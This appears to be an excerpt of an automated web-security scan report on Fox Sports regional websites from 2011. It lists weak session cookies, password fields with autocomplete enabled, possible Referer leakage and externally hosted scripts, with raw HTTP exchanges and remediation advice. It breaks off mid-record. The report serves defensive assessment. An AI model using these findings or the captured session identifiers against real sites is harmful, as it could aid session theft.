HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 68716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxsportswisconsin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:16 GMT Server: Apache Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]...
4. Password field with autocomplete enabledpreviousnext There are 19 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://www.foxsportsarizona.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 84050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 51085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportscarolinas.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportscarolinas.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 12 Jan 2011 16:30:48 GMT Date: Wed, 12 Jan 2011 16:30:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/ Content-Length: 67154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportsdetroit.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:03 GMT Server: Apache Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/Hoke-who/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:41 GMT Server: Apache Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:47 GMT Server: Apache Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:48 GMT Server: Apache Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportsflorida.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:50 GMT Server: Apache Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 47665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportshouston.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportshouston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportskansascity.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportskansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 67136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportsmidwest.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsmidwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:56 GMT Server: Apache Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 76839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportsohio.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportsohio.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:02 GMT Server: Apache Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 78763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportssouth.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:08 GMT Server: Apache Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 87289
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 83915
The page contains a form with the following action URL:
http://www.foxsportssouthwest.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportssouthwest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:09 GMT Server: Apache Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74557
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportstennessee.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportstennessee.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 68716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:11 GMT Server: Apache Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 58751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
http://www.foxsportswisconsin.com/
The form contains the following password field with autocomplete enabled:
login_password
Request
GET / HTTP/1.1 Host: www.foxsportswisconsin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:16 GMT Server: Apache Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 74886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:39 GMT Server: Apache Set-Cookie: PHPSESSID=807fffd592a9bf6fb7d8e7c887d5cf39; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 73519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:05 GMT Server: Apache Set-Cookie: PHPSESSID=85ff0994810525300d4e54d63c899e70; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 66884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1 Host: www.foxsportsdetroit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:48 GMT Server: Apache Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 62871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html?blockID=388962&feedID=7926 HTTP/1.1 Host: www.foxsportsflorida.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:26:53 GMT Server: Apache Set-Cookie: PHPSESSID=e13925e027f6802b91cb1759a97c21c0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 69118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1 Host: www.foxsportssouth.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:23:29 GMT Server: Apache Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 83915
GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html?blockID=389566&feedID=3709 HTTP/1.1 Host: www.foxsportswest.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:31:13 GMT Server: Apache Set-Cookie: PHPSESSID=5a10a35d0cd51561897895de30ab37c1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 79224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 12 Jan 2011 16:30:38 GMT Server: Apache Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 84050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... </script>-->
<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc/menz=1" type="text/javascript"></script> ...[SNIP]... <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script> <!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script> ...[SNIP]... <div id = "main_187"> <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script> ...[SNIP]... <!-- begin ad tag --> <script language="JavaScript" src="http://ad.doubleclick.net/adj/rsn.arizona/main;tile=3;sz=300x250;ord=1294849839?" type="text/javascript"></script> ...[SNIP]... <!-- SiteCatalyst code version: H.17.. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com --> <script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script> ...[SNIP]...
GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
